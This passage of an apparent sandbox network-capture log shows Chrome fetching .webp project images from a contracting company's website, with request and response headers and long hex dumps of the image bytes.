                                              Data Ascii: HVS4 2CWCUO:Z\fyL},=YJCB7!i%FOa91eY,zrcjp8nUDo)|zXU_M'C^yZh$s;{j';i_&TH[tlR@Q80!q zQW\VOr3'
                                              2024-09-27 06:20:17 UTC4719INData Raw: f9 8f ad b8 67 04 00 3a b8 7b 4f 28 22 b9 1b 72 ba 3e 86 78 07 f1 5e bc bb f1 f8 c1 da a3 cd 23 ce 1d 89 d4 54 3a 5c ee 49 af 62 22 b8 62 9d b0 ed a6 00 a0 83 6d 12 fc c0 3d dc a0 36 1c 82 3d 8e f2 f0 f3 49 7e c7 b6 ed 59 28 91 4a d6 e0 d8 d4 0e f8 ae 94 92 02 01 59 9e 50 7e 05 c3 37 a7 fd 2f 8b e5 36 4b e8 49 39 b6 f7 51 f5 8c 8f 4b 1a a9 ab 7a 07 30 a7 99 8a 51 e1 f6 5d 35 cb cf b5 b7 20 2f ae 6b 45 cd bf 75 22 fd 72 d2 bc ed c0 bb 39 ba 14 79 c4 0f a4 6c 6d 8c a6 4d 2c fa dd 21 d1 88 2f 41 c4 f5 10 5f 88 2f dc 3a 2c 8b 22 b1 37 d3 29 7c 8f e1 1c fe 3c 97 ad 12 1f 27 43 43 74 f8 d8 13 35 c1 49 83 24 61 15 c5 f7 5a 14 15 16 ff 1b 59 03 b5 8e 2f 2a f3 d7 fe 6c 71 0e 2b 0b 9e 89 bc 02 e1 ab a9 71 03 49 ff aa a1 6f b6 a9 a0 cd 8f 03 0a 40 a1 f9 cc f4 4c 93
                                              Data Ascii: g:{O("r>x^#T:\Ib"bm=6=I~Y(JYP~7/6KI9QKz0Q]5 /kEu"r9ylmM,!/A_/:,"7)|<'CCt5I$aZY/*lq+qIo@L


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              101192.168.2.465434173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC464OUTGET /uploads/projects/6/f8dd4bffdef039afd52cc92797706540.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 13:22:18 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 119988
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7930INData Raw: 52 49 46 46 ac d4 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 38 d4 01 00 10 2f 08 9d 01 2a cf 04 a3 03 3e e9 64 ab 50 29 25 32 34 aa 53 2c f2 90 1d 09 64 6e 2d a1 5e 0f 60 fe 13 0f fe 71 62 db d4 39 5b e5 c7 cb d7 99 f3 b4 f1 a7 bd d4 2e f7 14 54 86 25 fc 6e 76 02 41 a8 33 ff 4f 58 9f 38 99 ed 7a 3c d0 50 e1 bf 47 ed 37 67 bc 93 f1 8f f2 7f a6 f4 fe e4 5f 17 3e eb f9 3f 55 5f f2 78 4b ed 5f f6 bc ef 3a cb e7 63 e7 27 fe 1f 5d 3f dd 7f e8 fb 16 ff 94 f4 bb ea 03 cd 8f f6 7f fb bf ba de e9 df f9 7f 77 3d fc 7f 55 ff 81 fb 85 fe fb e4 63 fc 07 fc 1f 5b 4f 5b 2f ec df fa ff ff ff dd f8 5f fe 7f ff 8b ff ff b5 3f ad 0f f7 df fd 7e cc 5f bb 3e a0 1f fe 3d b9 3a 03 fc bb ff 47 9c cf a0 ff 7b e0 df e6 fe 93 1e d6 5f cc e7
                                              Data Ascii: RIFFWEBPVP8XVP8 8/*>dP)%24S,dn-^`qb9[.T%nvA3OX8z<PG7g_>?U_xK_:c']?w=Uc[O[/_?~_>=:G{_
                                              2024-09-27 06:20:17 UTC8000INData Raw: 06 40 4e 34 65 1d 28 10 97 8c 73 bd 1f 4e 2f 9e 95 9d 38 dc 5c e6 83 50 b3 28 73 17 03 1a f2 ba 5e 55 a4 ae a4 08 27 29 93 59 51 f1 b7 b8 e3 fa a4 82 4d ad db f4 5f 47 08 ad 1c 50 9c bb b1 30 65 43 eb ce 11 ee a6 4f 7d 09 56 e4 dc 43 17 28 88 25 27 f2 42 e5 19 df e9 25 23 0d 08 18 42 5d 08 f6 cd 3f 96 eb 13 22 46 36 67 03 25 5b e7 12 55 cb 68 66 9c 3b 54 e5 82 f7 dc 17 13 43 22 fd aa c5 52 7b 21 e3 ce 45 2e 65 20 20 cf 75 8c fb ce 29 f2 ee e8 63 11 47 60 34 a0 d4 f7 35 f0 85 34 80 81 d2 26 8f 85 09 84 bb 13 75 ea 3a ee 37 8f d2 3d 83 d6 c2 9f a3 4f 9b 2d 5e 14 69 94 38 7d 05 97 bb a5 f2 52 37 64 b2 9e 87 0c 9f bd 7b b5 5a 52 b6 40 3f 61 5f 36 72 0a f2 b3 5c 2f b5 88 6c 04 c5 1a 89 f3 ca 49 76 18 db 8e 5e 60 b1 cb 58 d6 63 bb ed ec da 5e a8 23 bd 50 2e 3c
                                              Data Ascii: @N4e(sN/8\P(s^U')YQM_GP0eCO}VC(%'B%#B]?"F6g%[Uhf;TC"R{!E.e u)cG`454&u:7=O-^i8}R7d{ZR@?a_6r\/lIv^`Xc^#P.<
                                              2024-09-27 06:20:17 UTC8000INData Raw: 82 86 f6 37 22 1b d7 39 79 03 40 d7 f4 ac 9e 81 da 04 b0 7a 8b c5 e6 e1 6a a0 ef 6c d0 27 d1 2c 77 96 51 64 46 4b 48 13 4b ad 05 81 ab ee 31 42 08 6c ca 01 03 ce 0b 9a 98 bf 67 e5 ab 3e 15 3b 62 b2 ac 68 17 17 e8 3c 2d 38 c0 6d ad 89 6d 1e e9 68 35 68 5d 7b 3c 30 e7 3c e5 25 51 38 13 a6 cb 20 38 79 31 d6 1b 77 23 f3 8d 4d 8b 3c be 92 48 5e 67 2c 84 fd 64 ad b3 d5 14 25 ec 0d 86 79 e7 93 71 7e 2b 66 fc db 67 aa 6b ca a1 af 6c 99 a0 12 46 96 d2 96 94 11 86 01 eb f0 3b 9d 27 c1 c3 1c 52 a5 59 7a 6e e9 c1 4f 57 83 b1 62 ce 07 9c d7 d9 35 7b 71 58 b4 ce 81 39 04 71 ef a0 8f 79 6c 74 22 38 aa a1 94 05 e2 19 13 e1 46 57 22 06 f7 a4 e1 cd 8a 95 53 98 fd 69 d5 45 a2 e7 6e ac 6e 1d 28 88 2c b5 de b0 b9 28 2c 38 d2 9c c9 92 00 d2 da 03 69 b2 76 47 52 45 26 94 10 68
                                              Data Ascii: 7"9y@zjl',wQdFKHK1Blg>;bh<-8mmh5h]{<0<%Q8 8y1w#M<H^g,d%yq~+fgklF;'RYznOWb5{qX9qylt"8FW"SiEnn(,(,8ivGRE&h
                                              2024-09-27 06:20:17 UTC8000INData Raw: 72 11 95 c8 b8 17 ed be e9 ee 0d 7c f1 c6 63 ae 6a 3e dd e6 ed c3 41 42 46 58 d1 3d 84 73 6f 48 29 f7 91 9b 71 ec 9a 2e 3e bc ef 6d 6c e2 64 83 a6 ce e0 aa 7b d8 51 93 10 dc da ee e7 ae d4 b0 7c 4c d7 64 a0 2d 98 20 b3 d2 8d e8 62 f2 e1 79 57 94 ed ce f3 ed 5a ed d2 93 f9 52 79 ae 51 e9 f3 3d 31 bf e4 f9 72 61 dd a7 d7 d7 67 ec 9d e2 79 6c 8c 61 d3 e6 f1 17 93 38 c4 21 f7 a6 5f fd 2d fc 4b fb cf 77 b2 c1 6e dd da e1 bc b3 c2 0a 2d 99 9c f1 09 3e 94 fc df 12 10 29 47 0a 6d c9 68 d8 09 24 0e bc b1 cf f4 8b e5 e3 09 fe d0 30 1f 67 e1 4d b3 02 19 73 91 e9 f7 e6 04 67 51 2d 7e 16 54 09 9f 63 42 bd f3 8e 5b 2c 0c 16 52 af 32 6f 5f 2a bc 55 bd 8a 3e c2 92 e5 37 44 d0 9d 3e 5f 8d 61 e2 f0 1f b1 6c fa 46 ab 6e 78 22 39 cd bf 2c 4d ac 7d 8e 3b fe 10 d5 db a9 be 30
                                              Data Ascii: r|cj>ABFX=soH)q.>mld{Q|Ld- byWZRyQ=1ragyla8!_-Kwn->)Gmh$0gMsgQ-~TcB[,R2o_*U>7D>_alFnx"9,M};0
                                              2024-09-27 06:20:17 UTC8000INData Raw: 97 ff 38 20 c9 a9 1e 9f bb ce be 6b c2 c0 9c 75 f8 8a f5 49 e5 1e ea c7 e0 16 f7 4d db 7c d7 aa ed 3e 22 2a f8 51 58 66 70 75 ff df 72 0c 19 25 92 25 3c 4b ec e7 24 9b 80 ad 21 38 7d 91 85 b9 8a ef 5e b8 cf b9 37 bf d1 a4 6b a1 2c c4 0d 30 11 3a 39 15 16 78 df 1b 08 fe bf a3 01 56 a0 25 e2 df 74 6e a3 12 2b d8 cb 68 15 1c 2d 56 a8 07 af 98 0a f8 d9 35 86 43 ac 8a a4 bd bf 80 74 d7 a7 56 8c 68 55 0d a7 8d 98 6e 8a 67 85 46 1b 15 d5 79 a2 32 47 84 74 bf 8a 69 dd cb b5 4d 3a 93 5d 46 e7 1a 2f b1 98 ac db bb 26 ce 4e 78 20 4c 89 e3 a2 e7 12 ea 71 5e 90 d3 52 2b 68 b4 ad 2a e2 70 26 04 c3 c0 6d d1 09 9a 05 90 24 ae 45 58 63 2d 19 1b 2c d5 56 5e af 7b 4f e2 b5 31 45 46 03 54 f5 9b 1c a8 b8 37 5f 53 ea 99 bb 03 7f a4 55 24 13 29 a0 f7 7f 5d db 24 94 9e d5 b8 1d
                                              Data Ascii: 8 kuIM|>"*QXfpur%%<K$!8}^7k,0:9xV%tn+h-V5CtVhUngFy2GtiM:]F/&Nx Lq^R+h*p&m$EXc-,V^{O1EFT7_SU$)]$
                                              2024-09-27 06:20:17 UTC8000INData Raw: df a7 28 70 5e 71 06 04 e9 3c ad 63 1e f3 02 62 c2 23 23 21 bb 34 c8 33 dd 0f 8f a6 d7 4b 86 65 55 29 26 bc 9c a0 ff 29 bc 0c 5f c0 c1 a8 f8 36 54 09 a7 4b bc b9 33 a9 f8 69 bb f5 df a6 93 22 1e 2b 78 58 5e dc 7d e9 a9 2e cf 1b ce 5f 64 9f 44 55 f5 05 4b 40 02 b9 dc d5 c6 47 c9 ef 6d 08 d2 bf 4a 26 e4 cb 79 c4 4d fc 34 57 80 eb 63 f9 45 a0 46 8d a2 52 27 f6 80 6e f6 0c 98 79 3a 2b 05 e5 e8 42 f9 c6 98 a7 45 b4 07 a7 48 82 15 40 a2 61 f1 3d 8f d6 bf 2e 10 c8 3f a5 7e 52 f4 26 0f 2f dd b5 02 c8 4b cb e6 1a 8f 79 2f d3 4d 66 25 10 dc 3b bd 43 a8 00 1c 3e 66 dc 2a 7c 6c 73 45 2b 83 d0 2b b1 b6 f9 ba d6 7e c4 55 0e cc bf 58 50 8f 44 c4 d8 58 2c 06 07 bf 05 42 59 65 3b ac 9a e3 77 4b f4 a3 9d 0d 5d 5b 33 f4 ab a1 85 41 26 78 a4 17 30 cf 6a e6 f5 26 79 43 17 dd
                                              Data Ascii: (p^q<cb##!43KeU)&)_6TK3i"+xX^}._dDUK@GmJ&yM4WcEFR'ny:+BEH@a=.?~R&/Ky/Mf%;C>f*|lsE++~UXPDX,BYe;wK][3A&x0j&yC
                                              2024-09-27 06:20:17 UTC8000INData Raw: bb cb cf 8e 94 1f a5 e9 12 f1 84 75 94 2c f4 0f d9 17 84 9e d4 5a 0c cf 1c 88 ec 0e d8 23 ef f0 d2 bd 94 37 ee f0 21 46 23 c3 99 64 66 c6 65 82 05 ff ba 26 85 6c fd 27 97 48 cc d4 1d 25 7f 19 3d 66 ae 79 a1 04 28 08 9c e3 1b b4 73 3a 35 7b 7f 7e 46 77 90 3f f9 1a 7a 05 a9 87 2e ac 01 34 f8 44 fc 0b be 96 88 19 ca 85 0a 09 8b fb 45 ee 84 af ed cd 8e fe 6f ee 9c 3f ea 51 82 26 09 2f 1a bf db 6c fc 0a aa 8d 3e ad 6b 86 d4 0a b1 7c d6 45 57 f6 86 73 d6 44 52 49 43 30 29 04 cb 2c 7a 03 1d 8c 68 41 b6 4e 20 48 7b 89 eb a9 d3 b2 82 2c 51 ec ca fd c2 31 a8 11 97 31 a8 68 8c 72 b1 bf 47 6a ae a5 ca 4b 8c 83 11 0c 7c 1b 74 0c 44 b1 a5 36 9f 0c a9 9c 4e f4 1c 0f ad f5 d7 22 62 af fb 07 1d 4e 23 03 2c f4 a3 73 51 72 ee 3f e2 c5 bf b5 4d 61 86 68 8e 0c db b5 fb ad fb
                                              Data Ascii: u,Z#7!F#dfe&l'H%=fy(s:5{~Fw?z.4DEo?Q&/l>k|EWsDRIC0),zhAN H{,Q11hrGjK|tD6N"bN#,sQr?Mah
                                              2024-09-27 06:20:17 UTC8000INData Raw: 20 d0 e6 d5 49 4f 6b 96 82 41 e6 49 80 c6 e4 ce 54 5b 60 40 2e ad b9 af d3 de 4c 74 f5 ea c9 0e 8b a7 f2 6d f6 7a d9 1f ac d1 9b 09 2d 60 ab c7 6c 42 58 23 5a 75 b6 d0 af c9 24 23 31 11 e7 6e 74 24 cd a9 de c8 a0 12 7a b3 0d e1 e3 c8 64 73 1a 8f 69 04 3a 3c 8f 86 5c 69 05 3b 7b 85 53 ea 17 d2 b2 c5 1a 1b ab de 74 2e 36 03 45 a6 0c 70 5b 6e c4 23 01 f6 fa e4 4b bf 45 27 f3 f0 d9 9b 52 2f 3a 0d eb e8 89 42 73 66 2e 69 a9 5a 0f fd 53 f9 46 a7 62 24 15 49 54 e2 8a 8f 6a e5 e3 ad ee a2 d5 97 9a 4a e7 cf 73 eb 33 fe 9c e4 a2 c7 99 2b 19 9f d4 18 06 f9 54 39 4c 87 07 64 c5 2a 2b e8 3b d8 04 18 fe ed 20 a2 01 c3 84 75 c6 94 1d 94 2d 77 a9 82 03 40 65 f2 60 36 2c 6b 63 f8 ec 7a cf a1 c5 39 67 7b 02 ac 27 89 5f ea 4d d6 f9 d7 44 29 45 c5 1c 7f fb 21 6d ed c7 3b 99
                                              Data Ascii: IOkAIT[`@.Ltmz-`lBX#Zu$#1nt$zdsi:<\i;{St.6Ep[n#KE'R/:Bsf.iZSFb$ITjJs3+T9Ld*+; u-w@e`6,kcz9g{'_MD)E!m;
                                              2024-09-27 06:20:17 UTC8000INData Raw: 14 46 ed 18 50 d1 bc 20 5c 8b ef 32 81 40 8f 62 68 bd 14 24 32 f1 a0 8b bb 5a c8 d1 cf 70 4d c5 2a 35 01 9e 52 bf 22 c6 39 6d 4e 96 87 55 ce 7c bf 5d 2e c8 9f 57 6f ad 72 a2 a2 af 1b 8a c2 32 83 11 7a 82 dc 55 66 da 3b 4f 93 05 92 c8 50 c8 0b 84 ff c8 e4 54 cc 59 f9 48 38 61 b1 51 d7 d9 b6 a0 f4 33 15 ff 2f 74 0c 92 d4 38 8f 55 88 b6 0b c5 54 a2 7c 25 e1 d3 83 f3 31 ff cd a4 4b 94 b5 0a c6 16 37 55 1a f3 a0 24 36 fd b5 f4 c5 96 42 e4 ec af e0 bc aa f5 58 7f a7 32 2c b2 b0 3e 00 8a b9 24 be 85 94 13 a2 27 4a c8 4f c8 82 bc dc 48 4a 85 bd e2 16 7c 9f bb 20 7f af 24 13 3c ab 26 27 d8 1a 52 6e a5 cc 05 f4 5b 12 0a d9 c2 11 d8 08 38 6b 0c cf a1 0e 56 5e 4d 44 e7 76 8a 67 cc 88 d7 fb 5f 12 f2 be 3e 50 b9 80 e6 8e 1c f6 57 36 78 80 51 cf f8 ca 56 d6 3a 40 08 77
                                              Data Ascii: FP \2@bh$2ZpM*5R"9mNU|].Wor2zUf;OPTYH8aQ3/t8UT|%1K7U$6BX2,>$'JOHJ| $<&'Rn[8kV^MDvg_>PW6xQV:@w
                                              2024-09-27 06:20:17 UTC8000INData Raw: 44 f3 fb 3f d2 39 0f f2 3b a8 0d 28 0b 99 c8 82 60 91 41 38 74 83 13 34 c8 f6 6e c2 ad 58 a3 de c7 59 ef 99 e4 ea 03 7f 51 cd 50 52 ec 41 c2 42 c3 99 56 bf c6 34 ad e5 c4 3f 18 ac 32 ef 17 de 48 2e 31 60 bc 81 b6 d5 5a 7c f0 20 8e f7 b3 1c e3 92 48 c3 1a 38 dd 32 95 de f4 00 01 86 b1 c6 1a c7 cd 79 9f 8f a6 1f 58 68 06 1e 31 c0 1b 56 4d 4c 02 50 82 f5 10 56 22 bb c7 63 58 0f ae b2 b7 5a 5e ec b1 31 c9 1b a4 bb ee f1 a5 10 71 93 d0 02 39 c0 0b 04 8f 32 5d fb d6 8a dd b3 a9 c3 9e eb e3 96 2f 18 d5 9f d6 f8 21 b2 7c e6 cb 11 3e 83 c5 d5 1a 4e 6e c2 7a aa 04 35 bb 50 cc 36 e3 e1 af 1d fb e7 04 0a c1 58 02 f1 54 c6 e2 7a b0 8b 4f c9 d7 bc c0 2e b3 40 e3 17 13 88 7c 92 88 8e 85 dc ed cd 03 ad 6f 74 bb cb 34 34 40 15 43 f8 0e 22 e8 5c 2b e6 95 4d 9a 5a d5 b3 df
                                              Data Ascii: D?9;(`A8t4nXYQPRABV4?2H.1`Z| H82yXh1VMLPV"cXZ^1q92]/!|>Nnz5P6XTzO.@|ot44@C"\+MZ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              102192.168.2.465435173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC724OUTGET /uploads/projects/24/edfba0a01d899e45cac743ee4b47082a.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:31:47 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 78900
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 2c 34 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 b8 33 01 00 30 0c 07 9d 01 2a cf 04 a3 03 3e e9 6e ae 50 29 26 a9 aa 27 b3 ab a1 40 1d 09 63 6e 06 31 02 b9 d7 e1 89 c6 6c ed e9 60 79 43 cf fe 7a bd 9a 0a b5 8b ba 0c 8f 6c 3f 6b e9 43 c4 49 b8 7c f6 fc e9 da aa fd 47 a5 b7 6d 7e 04 ef ca e4 2c 26 4d e7 ad 7f ef fd bf b2 46 3c be 67 9e 7f d1 ff c7 e7 7b ff bf b1 1f ee fe 91 3e 81 fd 5f ff 55 e8 7d f3 93 f4 99 f4 a5 f5 cd fe 51 d3 77 eb c9 fe bf 09 03 ff 87 9c cf a1 7f 7d ff c3 c4 3f d0 bd ec 7f 9f ff 99 ef 59 fd 16 69 fe 33 fd cf 36 3f ac ff 0f ff a7 ad 6f bf cf 20 ff 56 fe cb ff d7 a9 97 eb 7f bc 7d 47 ff cf c2 8f 85 ff df e8 83 e5 df ff ff fa 3c b2 76 82 f8 af fc 5f bc bf 05 5f ba 3e b3 77 68 ff ff f6
                                              Data Ascii: RIFF,4WEBPVP8XVP8 30*>nP)&'@cn1l`yCzl?kCI|Gm~,&MF<g{>_U}Qw}?Yi36?o V}G<v__>wh
                                              2024-09-27 06:20:17 UTC8000INData Raw: 93 e5 1a d0 fe 82 68 fa 6f f5 a1 20 69 30 fc 44 59 87 de 84 c4 23 ce 45 81 47 74 7e 0a 7f 1e 58 bb e1 a3 ac 46 0c a5 57 8b cf 4a dc b1 6d fc b0 84 24 ab e2 a2 d5 c2 3a 36 d7 47 fc 9c 90 7c 86 a1 b4 23 db b9 c8 fd 94 e3 0a e1 20 2b 47 c6 93 ab d0 3c 25 10 17 80 9f 3b ae e9 c8 42 9d 9c 28 2b e9 a6 82 bb ec df 02 97 47 2c 0e 4c 4a 88 0c 41 3d 29 ba aa e7 6a 4e 60 41 6a bf cb 3b 8e ab ea 11 2a 90 53 45 89 39 a9 10 54 2c ae cd 15 04 1c a5 7a e2 18 ba 17 93 cb 2c 18 ef ec 8e f2 0d 97 d7 e7 dc b3 dd 87 5b 38 0a 45 d8 88 66 05 26 94 5b cd 53 ce 36 0c 1e 0f 4a 96 47 2c d9 f7 d1 d1 9e dd 10 4e 4c 4f 04 25 a8 59 f0 27 84 a7 bc a6 45 b0 1b 8a cc f8 8d ce e8 8e 0d 4e c2 cc 29 d3 bc 05 0b a8 e5 67 df 47 70 f5 43 ff a1 ce 62 2d 31 22 c1 dd d0 1f d4 96 cd b3 69 bc 3f 21
                                              Data Ascii: ho i0DY#EGt~XFWJm$:6G|# +G<%;B(+G,LJA=)jN`Aj;*SE9T,z,[8Ef&[S6JG,NLO%Y'EN)gGpCb-1"i?!
                                              2024-09-27 06:20:17 UTC8000INData Raw: 0c 00 60 6a 43 8e b7 cc e4 69 5a 14 fd dc 4c 16 76 72 f1 17 7a aa 77 c6 70 30 76 c3 ae d7 63 6f a7 40 96 ee 06 d6 5c c3 c7 fa 86 18 03 45 53 e8 d4 1f 1f 01 4b 8e 4f 4c ed 79 d3 a0 b1 63 d0 8c dd ce 20 c7 f9 29 e6 2a 53 0f aa 02 69 9f 41 bb 93 d8 9d a5 50 1f 20 5e 14 2f a0 b4 96 8d 7c a2 7f 95 db 7d ea b2 94 28 41 94 d1 cd 3f 75 1b b2 05 98 85 e3 9f 93 a4 a0 b4 00 00 00 09 ce 47 35 80 00 00 00 00 00 00 00 00 fd 5d 08 28 00 00 01 21 e5 fd f5 77 ae 4b 48 c1 e9 b6 b1 f3 0b f8 a0 04 e5 9b d5 a7 f1 fb 16 26 11 0b cd 6c 72 d9 d8 53 0d 7d 29 e7 01 74 50 d6 8a 55 c2 27 9e da 27 2d ed a3 77 72 33 af 13 0e 16 85 36 cf e4 d8 3c 0f 7f 0b 78 e7 50 91 80 53 ed 94 79 56 01 11 11 f4 72 76 ca eb 4c 18 9d a4 14 7d 4c e4 69 89 a0 00 b9 b8 17 8d d5 72 88 f7 d7 71 c0 5f 85 0b
                                              Data Ascii: `jCiZLvrzwp0vco@\ESKOLyc )*SiAP ^/|}(A?uG5](!wKH&lrS})tPU''-wr36<xPSyVrvL}Lirq_
                                              2024-09-27 06:20:17 UTC8000INData Raw: b7 8e dd 66 83 ca 5d 2b 9c 07 d1 41 4d ee a2 9c f1 e9 fe b0 71 e9 14 73 5d de cd 65 76 8d c9 11 7a 5c 44 d1 fb f0 5d 33 43 7c f7 26 0e ad f4 62 f6 42 98 4a 69 f9 42 95 cd 44 8e d5 f4 eb de 7d 99 77 79 c6 38 7f 15 bd 49 55 03 d8 60 5f 9c fa 7d 28 ab 1c 24 c8 fd 77 2b 32 fa 96 24 9a 14 ca 9a e9 24 1e 09 cd 09 f9 03 e4 4d 59 46 ce 9f db 12 58 b9 21 1d 0e e5 19 ed ad 0c 32 fe a8 84 a0 f1 e2 71 ba 88 ad e8 00 9a 0c f2 7f c3 28 ea 37 db 6b 05 c4 47 f2 dd 96 14 ee 9a c0 05 d0 71 32 61 46 d4 b1 66 51 4b fc 34 10 bf d1 a9 05 fd 0b 54 f1 f6 74 d5 1c 9d d1 96 11 e1 69 ca 77 ce 90 70 5f ff f8 40 18 d2 1a 75 1a 84 8f 5b 0e 76 c7 2a f8 09 f1 17 53 98 92 07 d0 e4 63 c3 ed 41 16 35 d0 b7 d2 6e ea a2 89 f1 d4 85 e2 14 e4 cf 5e 13 e4 d8 c3 d0 c7 50 e5 fc 00 10 b7 4d a4 cd
                                              Data Ascii: f]+AMqs]evz\D]3C|&bBJiBD}wy8IU`_}($w+2$$MYFX!2q(7kGq2aFfQK4Ttiwp_@u[v*ScA5n^PM
                                              2024-09-27 06:20:17 UTC8000INData Raw: d1 fb a5 1d 15 50 9c e3 37 d3 2b 0a 5f 12 a5 a6 a7 d1 36 1e 23 cf 2f 1d 7a 54 f0 0f e7 1d b9 3f 08 f4 c6 cc 64 46 85 15 28 84 85 78 95 4a 7a 2e b0 a3 f6 ee 53 4a 1f 0f 58 ec b4 ad 1c ac 35 c6 ca da 11 74 ab cf e3 9a 84 6e ff 07 34 ca d7 be d6 f4 8d be d9 fe 23 ca a0 f7 b3 2d ed de 5a d0 73 44 ca 93 e0 e8 ef f1 fb c3 ce 9d 9a 3b 2b 81 1d 5b ad c4 76 e3 dd 10 73 28 af 4f 0d 39 59 da a8 5d 3c 96 87 17 9f 9a ae da 59 cd 42 db 9c e3 af 82 2a 9b f6 a6 d1 72 06 b7 21 37 4d da 5f 8a 36 3c eb 35 66 5d 9e 71 b4 c9 2f a9 bb 68 85 05 8f 25 2e 9a a3 8d 62 b3 61 32 14 0c c2 26 39 da f7 c7 02 c1 09 20 53 b2 71 9e 35 2c 9c 3d 06 97 66 92 a0 d1 61 f2 c1 3e 52 4f 92 40 d0 25 81 73 ce 6f 11 14 80 1c b6 3e d4 49 20 c4 c7 e5 69 0e 21 17 9e 38 67 e8 55 51 f0 0f 82 9f eb f3 89
                                              Data Ascii: P7+_6#/zT?dF(xJz.SJX5tn4#-ZsD;+[vs(O9Y]<YB*r!7M_6<5f]q/h%.ba2&9 Sq5,=fa>RO@%so>I i!8gUQ
                                              2024-09-27 06:20:17 UTC8000INData Raw: c4 52 f5 dc c6 c4 1a c1 94 51 5c d7 d6 16 56 7e a5 23 c8 7d ca 9b e0 f2 9b ee 68 a4 f1 b1 ed 17 cc 91 ec 23 b3 2b a8 ce d3 9b f9 0b 55 90 42 16 ec 7e e2 3c 8f 13 a2 c9 e0 bf ef e3 15 8b 9b d2 7b bf e8 66 e1 44 e2 17 94 f5 58 46 be 15 aa d1 65 0d 3f 40 b7 f3 21 8d a5 1e 2f 56 33 c9 a6 06 b1 84 94 bf ce b9 85 8c c8 07 a1 f6 48 af d1 6c d9 27 dd bf fd ac cb 28 45 bf 41 4a 8f af ac b5 60 c7 ff 49 84 f6 c4 de e6 8c 13 68 2f ef 79 cc 8f 41 1f 30 53 37 be 17 74 32 1f c8 b3 ec f4 29 73 4c 90 72 50 45 18 06 19 29 13 e0 fd 61 7a 64 21 b7 57 fc 4f c5 2d 2b 21 f8 ff 10 57 e1 fa 90 fe 4f d7 74 c3 24 63 15 ce 82 cc 30 22 c2 f1 8a 33 e0 de a6 ea 8b b5 0d 1c 85 43 21 53 0d ad bf 31 48 6a 72 8b 5d 70 f6 02 80 0b b2 d5 c6 e6 63 05 9a 39 29 41 ba 04 c7 72 9f a7 a9 08 53 03
                                              Data Ascii: RQ\V~#}h#+UB~<{fDXFe?@!/V3Hl'(EAJ`Ih/yA0S7t2)sLrPE)azd!WO-+!WOt$c0"3C!S1Hjr]pc9)ArS
                                              2024-09-27 06:20:17 UTC8000INData Raw: b5 11 ab be 2c 33 9a d5 5c 42 1c 86 45 20 fc 93 75 92 f0 f1 28 71 d8 11 44 bc 1e c6 0f 35 e5 82 e1 76 cc 24 6d b8 51 2e eb e3 1e bc 3a e6 a7 7e ac 03 03 90 f3 01 a4 bb 74 27 67 32 a9 e8 32 4f 82 44 bb 17 f7 a0 e6 a1 c9 a8 55 48 41 bd d4 f8 df 4e 49 ba eb 5c 02 0a 59 db 31 9d ae 25 83 55 b4 05 bb b9 1c 4b c3 b0 2e 11 a1 a9 79 a9 ea 2f f2 84 35 7a 91 a1 14 45 18 fc 52 24 86 b1 0e 53 5b 63 a0 c1 b0 ee c4 b5 eb 20 f0 a4 fe e8 58 0c ae f7 b9 ad c6 f5 58 01 1a 5c 85 1c 43 7c 96 0d 7d 87 df 5c 45 be 53 99 c2 8f 89 8a e1 2a b2 7b 6e 15 9c 18 b4 96 1a 03 59 7c e8 e9 ad 57 29 3f bf e6 3c 34 08 4e 88 25 2b c7 d3 6c 90 49 8c 9c df 8e ba da a2 da 3d 15 9e 53 f9 e5 f6 dc 75 57 0c bc 9a b8 0d a5 8d 13 cf c9 24 3b 58 9a 35 6e 15 04 ad 71 6d 00 8e 35 6c 70 e7 69 81 eb 41
                                              Data Ascii: ,3\BE u(qD5v$mQ.:~t'g22ODUHANI\Y1%UK.y/5zER$S[c XX\C|}\ES*{nY|W)?<4N%+lI=SuW$;X5nqm5lpiA
